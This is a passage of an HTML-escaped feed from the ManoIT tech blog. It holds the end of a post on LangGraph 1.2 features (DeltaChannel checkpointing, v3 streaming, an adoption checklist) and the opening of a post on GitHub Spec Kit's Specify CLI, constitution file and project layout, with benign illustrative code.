&lt;/span&gt;    &lt;span class="c1"&gt;# full snapshot every 5 steps -&amp;gt; lower write cost, bounded read latency
&lt;/span&gt;    &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Annotated&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nc"&gt;DeltaChannel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;add_messages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;snapshot_frequency&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Default channel&lt;/th&gt;
&lt;th&gt;DeltaChannel (beta)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Per-step serialization&lt;/td&gt;
&lt;td&gt;Re-serialize full value&lt;/td&gt;
&lt;td&gt;Store delta only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Write cost&lt;/td&gt;
&lt;td&gt;Grows with thread length&lt;/td&gt;
&lt;td&gt;Roughly constant per step, plus a full snapshot every K steps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Read latency&lt;/td&gt;
&lt;td&gt;Low (full value on hand)&lt;/td&gt;
&lt;td&gt;Bounded via &lt;code&gt;snapshot_frequency&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best for&lt;/td&gt;
&lt;td&gt;Small, rarely-changing channels&lt;/td&gt;
&lt;td&gt;Long, large channels (message lists)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
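
&lt;p&gt;The write/read trade-off in the table can be reproduced with a toy model. The sketch below does not use &lt;code&gt;DeltaChannel&lt;/code&gt;'s storage format. &lt;code&gt;ToyDeltaLog&lt;/code&gt; is a hypothetical append-only list channel: each step writes only the new items, and every &lt;code&gt;snapshot_frequency&lt;/code&gt;-th step writes a full copy. JSON length serves as a rough proxy for bytes written. A read replays at most &lt;code&gt;snapshot_frequency - 1&lt;/code&gt; deltas after the newest snapshot, which is what keeps read latency bounded.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import json


class ToyDeltaLog:
    """Hypothetical append-only list channel with periodic full snapshots."""

    def __init__(self, snapshot_frequency):
        self.k = snapshot_frequency
        self.records = []  # one ("delta", new_items) or ("snapshot", full_value) per step
        self.value = []
        self.bytes_written = 0

    def append_step(self, new_items):
        self.value = self.value + list(new_items)
        step = len(self.records) + 1
        if step % self.k == 0:
            record = ("snapshot", list(self.value))  # full copy every k-th step
        else:
            record = ("delta", list(new_items))  # only what this step added
        self.records.append(record)
        self.bytes_written += len(json.dumps(record[1]))

    def read(self):
        """Rebuild the value from the newest snapshot plus the deltas written after it."""
        start, value = 0, []
        for index in range(len(self.records) - 1, -1, -1):
            if self.records[index][0] == "snapshot":
                start, value = index + 1, list(self.records[index][1])
                break
        for _kind, items in self.records[start:]:
            value.extend(items)
        return value
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Raising &lt;code&gt;snapshot_frequency&lt;/code&gt; lowers the total bytes written but lengthens the replay on read. Lowering it does the opposite, which makes it the knob to tune per channel.&lt;/p&gt;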

&lt;h2&gt;
  
  
  6. Streaming API v3 — content-block-centric, typed projections
&lt;/h2&gt;

&lt;p&gt;Streaming chunk shapes used to differ per mode, making UI integration awkward. 1.2's new event streaming API activates when you pass &lt;strong&gt;&lt;code&gt;version="v3"&lt;/code&gt;&lt;/strong&gt; to &lt;code&gt;stream_events()&lt;/code&gt; / &lt;code&gt;astream_events()&lt;/code&gt;, offering a &lt;strong&gt;content-block-centric protocol&lt;/strong&gt; with &lt;strong&gt;typed, per-channel projections&lt;/strong&gt;. The four first-class projections are &lt;code&gt;run.values&lt;/code&gt;, &lt;code&gt;run.messages&lt;/code&gt;, &lt;code&gt;run.lifecycle&lt;/code&gt;, and &lt;code&gt;run.subgraphs&lt;/code&gt;, plus opt-in transformers for updates, custom events, checkpoints, tasks, and debug. Notably, &lt;code&gt;run.messages&lt;/code&gt; yields &lt;strong&gt;one &lt;code&gt;ChatModelStream&lt;/code&gt; per LLM call&lt;/strong&gt;, with typed sub-projections for text, reasoning, tool calls, and usage. &lt;code&gt;version="v1"&lt;/code&gt; and &lt;code&gt;"v2"&lt;/code&gt; are unchanged, so migration is gradual.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# content-block-centric streaming — run.messages is one ChatModelStream per LLM call
&lt;/span&gt;&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;graph&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;astream_events&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;inputs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;version&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;v3&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;run&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;          &lt;span class="c1"&gt;# ChatModelStream
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;        &lt;span class="nf"&gt;yield_to_ui&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;        &lt;span class="c1"&gt;# body text
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reasoning&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;   &lt;span class="nf"&gt;debug&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reasoning&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;         &lt;span class="c1"&gt;# reasoning trace
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tool_calls&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="nf"&gt;trace_tools&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tool_calls&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# tool calls
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;       &lt;span class="nf"&gt;meter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;             &lt;span class="c1"&gt;# token usage / cost
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Projection&lt;/th&gt;
&lt;th&gt;Content&lt;/th&gt;
&lt;th&gt;Typical use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.values&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Current graph state values&lt;/td&gt;
&lt;td&gt;Render final/intermediate state&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.messages&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;One &lt;code&gt;ChatModelStream&lt;/code&gt; per LLM call&lt;/td&gt;
&lt;td&gt;Token streaming UI, cost metering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.lifecycle&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Node start/end lifecycle events&lt;/td&gt;
&lt;td&gt;Progress, observability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.subgraphs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-subgraph events&lt;/td&gt;
&lt;td&gt;Multi-agent / nested graph tracing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
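
&lt;p&gt;The idea of a typed, per-call projection can be illustrated without the real API. The hypothetical sketch below takes a flat sequence of &lt;code&gt;(call_id, block_type, payload)&lt;/code&gt; events and groups it into one object per LLM call. Each object has separate text, reasoning, tool-call, and usage fields, roughly the shape the text attributes to &lt;code&gt;ChatModelStream&lt;/code&gt;. The event tuple format and the &lt;code&gt;ToyMessageStream&lt;/code&gt; class are assumptions for illustration, not LangGraph's wire protocol.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;from dataclasses import dataclass, field


@dataclass
class ToyMessageStream:
    """Hypothetical per-LLM-call view with one typed field per content-block kind."""

    call_id: str
    text: str = ""
    reasoning: str = ""
    tool_calls: list = field(default_factory=list)
    usage: dict = field(default_factory=dict)


def project_messages(events):
    """Group flat (call_id, block_type, payload) events into one object per LLM call."""
    streams = {}
    for call_id, block_type, payload in events:
        stream = streams.setdefault(call_id, ToyMessageStream(call_id))
        if block_type == "text":
            stream.text += payload
        elif block_type == "reasoning":
            stream.reasoning += payload
        elif block_type == "tool_call":
            stream.tool_calls.append(payload)
        elif block_type == "usage":
            stream.usage.update(payload)
        else:
            raise ValueError("unknown block type: " + block_type)
    return list(streams.values())  # dicts keep insertion order, so calls stay in order
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The payoff matches what v3 advertises: UI code reads &lt;code&gt;stream.text&lt;/code&gt; and metering code reads &lt;code&gt;stream.usage&lt;/code&gt;, and neither has to branch on per-mode chunk shapes.&lt;/p&gt;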

&lt;h2&gt;
  
  
  7. The ecosystem — langchain 1.3 and deepagents 0.6 shipped the same day
&lt;/h2&gt;

&lt;p&gt;1.2 didn't ship alone. On the same day, May 12, 2026, &lt;strong&gt;langchain v1.3.0&lt;/strong&gt; added &lt;code&gt;version="v3"&lt;/code&gt; support in &lt;code&gt;stream_events()&lt;/code&gt; / &lt;code&gt;astream_events()&lt;/code&gt; for &lt;code&gt;create_agent&lt;/code&gt;-based agents, and &lt;strong&gt;deepagents v0.6.0&lt;/strong&gt; added (1) an experimental &lt;code&gt;CodeInterpreterMiddleware&lt;/code&gt; that enables code execution and programmatic tool calling through a scoped &lt;strong&gt;QuickJS runtime&lt;/strong&gt;, and (2) the same &lt;code&gt;version="v3"&lt;/code&gt; streaming support. So v3 streaming is aligned across the LangGraph runtime, the LangChain agent layer, and Deep Agents at once — whichever layer you start from, you consume the &lt;strong&gt;same content-block protocol&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. ManoIT internal adoption checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Pin to &lt;code&gt;langgraph&lt;/code&gt; 1.2.0 / &lt;code&gt;langchain&lt;/code&gt; 1.3.0 (confirm no breaking changes)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Lockfile + CI green&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Convert external tool/LLM nodes to async (timeout prerequisite)&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;100% target nodes async&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;run_timeout&lt;/code&gt; on tool nodes, &lt;code&gt;idle_timeout&lt;/code&gt; on streaming nodes&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;0 infinite waits (load test)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;error_handler&lt;/code&gt; + compensation node on irreversible steps (payment, booking)&lt;/td&gt;
&lt;td&gt;Backend&lt;/td&gt;
&lt;td&gt;Auto-rollback on fault injection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Wire SIGTERM -&amp;gt; &lt;code&gt;request_drain()&lt;/code&gt;, verify resume&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;0 work loss during rolling deploy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Apply/tune &lt;code&gt;DeltaChannel(snapshot_frequency=K)&lt;/code&gt; on long channels&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Lower checkpoint p99 write time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Migrate stream consumption to &lt;code&gt;version="v3"&lt;/code&gt; (run v2 in parallel)&lt;/td&gt;
&lt;td&gt;Frontend/BFF&lt;/td&gt;
&lt;td&gt;Unified token UI + usage metering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;PoC deepagents &lt;code&gt;CodeInterpreterMiddleware&lt;/code&gt; (sandbox isolation)&lt;/td&gt;
&lt;td&gt;AI team&lt;/td&gt;
&lt;td&gt;QuickJS isolation + resource limits verified&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. Conclusion — "an agent isn't a function; it's a durable graph that dies and revives per node"
&lt;/h2&gt;

&lt;p&gt;In one line, LangGraph 1.2 is &lt;strong&gt;"the release that pushed fault tolerance down from the whole graph to individual nodes, finally lifting agent execution into truly operable durable execution."&lt;/strong&gt; &lt;code&gt;run_timeout&lt;/code&gt;/&lt;code&gt;idle_timeout&lt;/code&gt; separate "infinite wait" from "legitimately long response," &lt;code&gt;error_handler&lt;/code&gt; folds post-failure compensation into the graph topology, and &lt;code&gt;request_drain()&lt;/code&gt; turns deploys into work-loss-free events. &lt;code&gt;DeltaChannel&lt;/code&gt; tackles long-thread checkpoint cost, and Streaming v3 cleans up the previously inconsistent stream shapes.&lt;/p&gt;

&lt;p&gt;Three operational recommendations to close. (1) &lt;strong&gt;Make nodes async before adopting timeouts&lt;/strong&gt; — timeouts are async/Python-only, so without this prerequisite they're inert. (2) &lt;strong&gt;Always pair irreversible steps with a compensation node&lt;/strong&gt; — piling on retries without an &lt;code&gt;error_handler&lt;/code&gt; just turns "graph explodes after 3 failures" into a production incident. (3) &lt;strong&gt;Wire &lt;code&gt;request_drain()&lt;/code&gt; into your deploy pipeline first&lt;/strong&gt; — it's the smallest change that buys the most stability. The shortest one-liner: &lt;em&gt;this sprint, attach a &lt;code&gt;TimeoutPolicy&lt;/code&gt; and an &lt;code&gt;error_handler&lt;/code&gt; to your single most stall-prone tool node, wire a drain into rolling deploys, and measure zero work loss.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official LangChain changelog (docs.langchain.com — langgraph v1.2.0 / langchain v1.3.0 / deepagents v0.6.0, May 12, 2026 entries), the langchain-ai/langgraph GitHub Releases, and the LangGraph durable execution / persistence / human-in-the-loop docs as primary sources. API names, signatures, and behaviors reflect the official changelog as of publication (2026-06-01); &lt;code&gt;DeltaChannel&lt;/code&gt; and v3 streaming are explicitly beta and may change. Code samples are illustrative, based on documented signatures — verify the latest API and beta status on docs.langchain.com and GitHub Releases before production use. Timeouts and error handlers are Python-only; timeouts work on async nodes only.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1481956" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>llm</category>
      <category>machinelearning</category>
      <category>agents</category>
    </item>
    <item>
      <title>GitHub Spec Kit Deep Dive — Spec-Driven Development, the Constitution, /speckit.* Slash Commands, and the Specify CLI for Taming AI Coding Agents</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Sun, 31 May 2026 13:03:24 +0000</pubDate>
      <link>https://dev.to/x4nent/github-spec-kit-deep-dive-spec-driven-development-the-constitution-speckit-slash-commands-1m71</link>
      <guid>https://dev.to/x4nent/github-spec-kit-deep-dive-spec-driven-development-the-constitution-speckit-slash-commands-1m71</guid>
      <description>&lt;p&gt;As AI coding agents become routine, the most common failure mode is &lt;em&gt;vibe coding&lt;/em&gt;: you start with a one-line prompt and the code itself silently becomes the spec. Code is inherently a &lt;strong&gt;binding artifact&lt;/strong&gt; — once an implementation is locked in, every shifting requirement triggers expensive rework. &lt;strong&gt;GitHub Spec Kit&lt;/strong&gt; flips this on its head. Instead of treating specifications as throwaway scaffolding you discard once "real coding" begins, it promotes the specification to a &lt;strong&gt;first-class, executable artifact&lt;/strong&gt; — the heart of &lt;strong&gt;Spec-Driven Development (SDD)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Open-sourced by GitHub in September 2025, Spec Kit has grown into the most widely adopted SDD tool as of May 2026, with 90k+ stars and 8k+ forks. Its official docs were last updated on May 27, 2026, and it now supports 30+ coding agents. This guide breaks down the &lt;code&gt;Constitution&lt;/code&gt;, the &lt;code&gt;/speckit.*&lt;/code&gt; slash commands, and the &lt;code&gt;Specify CLI&lt;/code&gt; from an operations and architecture lens — plus the rollout checklist ManoIT used internally.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why Spec-Driven Development in 2026
&lt;/h2&gt;

&lt;p&gt;As Microsoft's developer blog puts it, SDD is &lt;em&gt;not&lt;/em&gt; about long requirement docs nobody reads, and it's not a return to waterfall. The point is to make technical decisions &lt;strong&gt;explicit, reviewable, and evolvable&lt;/strong&gt;: "version control for your thinking." Suppose that three sprints into building a notification system you discover the PM assumed per-channel toggles, the backend built a single on/off switch, and the frontend wired up OS notifications. That's not a communication failure; it's &lt;strong&gt;missing shared context&lt;/strong&gt;. SDD surfaces those assumptions while changing direction still costs a few keystrokes rather than entire sprints.&lt;/p&gt;

&lt;p&gt;This matters even more with AI agents. Because the spec lives &lt;em&gt;outside&lt;/em&gt; the code, you can generate a Rust and a Go variant from the same spec to compare performance, or explore multiple design directions in parallel — &lt;strong&gt;multi-variant implementation&lt;/strong&gt;. The spec becomes the asset that steers the agent toward the right solution.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Traditional / Vibe Coding&lt;/th&gt;
&lt;th&gt;Spec-Driven Development&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Primary artifact&lt;/td&gt;
&lt;td&gt;Code (spec is scaffolding, discarded)&lt;/td&gt;
&lt;td&gt;Spec (executable, generates code)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Requirement negotiation&lt;/td&gt;
&lt;td&gt;Negotiated in code → costly rework&lt;/td&gt;
&lt;td&gt;Negotiated in Markdown → a few keystrokes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Decision record&lt;/td&gt;
&lt;td&gt;Email, someone's head, scattered docs&lt;/td&gt;
&lt;td&gt;Version-controlled spec / plan / constitution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI agents&lt;/td&gt;
&lt;td&gt;One-shot prompt, unpredictable result&lt;/td&gt;
&lt;td&gt;Multi-step refinement, steered by shared context&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tool lock-in&lt;/td&gt;
&lt;td&gt;Bound to agent / IDE&lt;/td&gt;
&lt;td&gt;30+ swappable agents, spec stays constant&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  2. Specify CLI — install and bootstrap
&lt;/h2&gt;

&lt;p&gt;Spec Kit has two pillars: (1) the &lt;strong&gt;Specify CLI&lt;/strong&gt; (Python-based, MIT-licensed, package &lt;code&gt;specify-cli&lt;/code&gt;) that scaffolds a project for SDD, and (2) a bundle of &lt;strong&gt;templates and helper scripts&lt;/strong&gt; defining what a spec, plan, and task list look like. There is no magic beyond these two parts. Prerequisites:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Linux / macOS / Windows (native or WSL)&lt;/li&gt;
&lt;li&gt;A supported AI coding agent (Copilot, Claude, Gemini, Codex, Cursor, Windsurf, and 30+ others)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;uv&lt;/code&gt; (recommended) or &lt;code&gt;pipx&lt;/code&gt; for a persistent install&lt;/li&gt;
&lt;li&gt;Python 3.11+&lt;/li&gt;
&lt;li&gt;Git&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Persistent install (recommended) — replace vX.Y.Z with the latest Releases tag&lt;/span&gt;
uv tool &lt;span class="nb"&gt;install &lt;/span&gt;specify-cli &lt;span class="nt"&gt;--from&lt;/span&gt; git+https://github.com/github/spec-kit.git@vX.Y.Z

&lt;span class="c"&gt;# Or bootstrap directly with a one-off run (uvx)&lt;/span&gt;
uvx &lt;span class="nt"&gt;--from&lt;/span&gt; git+https://github.com/github/spec-kit.git specify init my-project

&lt;span class="c"&gt;# Initialize a project and pick your agent&lt;/span&gt;
specify init my-project &lt;span class="nt"&gt;--integration&lt;/span&gt; copilot
&lt;span class="nb"&gt;cd &lt;/span&gt;my-project

&lt;span class="c"&gt;# List integrations available in your installed version&lt;/span&gt;
specify integration list
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Initialization creates a &lt;code&gt;.specify/&lt;/code&gt; folder plus an agent-specific folder (e.g. &lt;code&gt;.github/&lt;/code&gt; for Copilot). &lt;code&gt;.specify&lt;/code&gt; holds the spec/plan/tasks templates and the scripts for your platform (bash for POSIX, PowerShell for native Windows). And one file you may not have seen before — &lt;code&gt;memory/constitution.md&lt;/code&gt; — is the keystone.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Structure created after `specify init` (abridged)&lt;/span&gt;
my-project/
├── .github/                      &lt;span class="c"&gt;# agent-specific: slash-command prompt definitions&lt;/span&gt;
│   └── prompts/
│       ├── specify.prompt.md
│       ├── plan.prompt.md
│       └── tasks.prompt.md
└── .specify/
    ├── memory/
    │   └── constitution.md       &lt;span class="c"&gt;# non-negotiable principles (project constitution)&lt;/span&gt;
    ├── scripts/                  &lt;span class="c"&gt;# bash or powershell helpers&lt;/span&gt;
    └── templates/                &lt;span class="c"&gt;# spec / plan / tasks / agent-file templates&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On init, Specify ensures you're inside a Git repository, creating one if needed. The helper scripts then keep all of a feature's work on a &lt;strong&gt;single feature branch&lt;/strong&gt; and make sure subsequent prompts reference the spec, plan, and data contracts created earlier.&lt;/p&gt;
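
&lt;p&gt;To make the branch convention concrete, here is a minimal TypeScript sketch of how a helper could derive the next feature name. It assumes the zero-padded &lt;code&gt;NNN-short-name&lt;/code&gt; pattern (for example &lt;code&gt;001-photo-albums&lt;/code&gt;) that Spec Kit uses for feature branches and their &lt;code&gt;specs/&lt;/code&gt; directories. &lt;code&gt;slugify&lt;/code&gt; and &lt;code&gt;nextFeatureName&lt;/code&gt; are hypothetical names, and the real bash/PowerShell scripts in your installed version may apply different rules.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;// Hypothetical helper modeled on the NNN-short-name convention; not Spec Kit's actual script.

// Turn a free-text feature description into a short kebab-case slug.
function slugify(description: string, maxWords: number): string {
  const words = description
    .toLowerCase()
    .replace(/[^a-z0-9]+/g, " ")
    .trim()
    .split(" ")
    .filter(Boolean);
  return words.slice(0, maxWords).join("-");
}

// Pick the next zero-padded feature number after the highest one already in use.
function nextFeatureName(existingBranches: string[], description: string): string {
  let highest = 0;
  for (const branch of existingBranches) {
    const match = /^(\d{3})-/.exec(branch);
    if (match) {
      highest = Math.max(highest, parseInt(match[1], 10));
    }
  }
  const padded = ("00" + String(highest + 1)).slice(-3);
  return padded + "-" + slugify(description, 3);
}

// The same name can serve as both the Git branch and the specs/ subdirectory.
const branches = ["main", "001-photo-albums", "002-user-auth"];
console.log(nextFeatureName(branches, "Add photo sharing via links!"));
// 003-add-photo-sharing
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;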

&lt;h2&gt;
  
  
  3. The Constitution — lock non-negotiables before any code
&lt;/h2&gt;

&lt;p&gt;In SDD, the &lt;strong&gt;Constitution&lt;/strong&gt; captures a project's &lt;em&gt;non-negotiable principles&lt;/em&gt;: "web apps always follow this testing approach," "every app this team builds is CLI-first," and so on — pinned down &lt;strong&gt;before any SDD iteration begins&lt;/strong&gt;. This is how organizations establish an &lt;strong&gt;opinionated stack&lt;/strong&gt; that guides every new and existing project.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run your agent in the project dir, then first of all:&lt;/span&gt;
/speckit.constitution Create principles focused on code quality, testing standards, user experience consistency, and performance requirements
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates or updates &lt;code&gt;.specify/memory/constitution.md&lt;/code&gt;, which the agent references during the &lt;code&gt;specify&lt;/code&gt;, &lt;code&gt;plan&lt;/code&gt;, and &lt;code&gt;implement&lt;/code&gt; phases. The constitution isn't just a doc — it's a &lt;strong&gt;guardrail that binds every subsequent step&lt;/strong&gt;. The plan produced by &lt;code&gt;/speckit.plan&lt;/code&gt; is grounded by the constitution, suppressing decisions that violate your conventions.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. The core workflow — /speckit.* slash commands
&lt;/h2&gt;

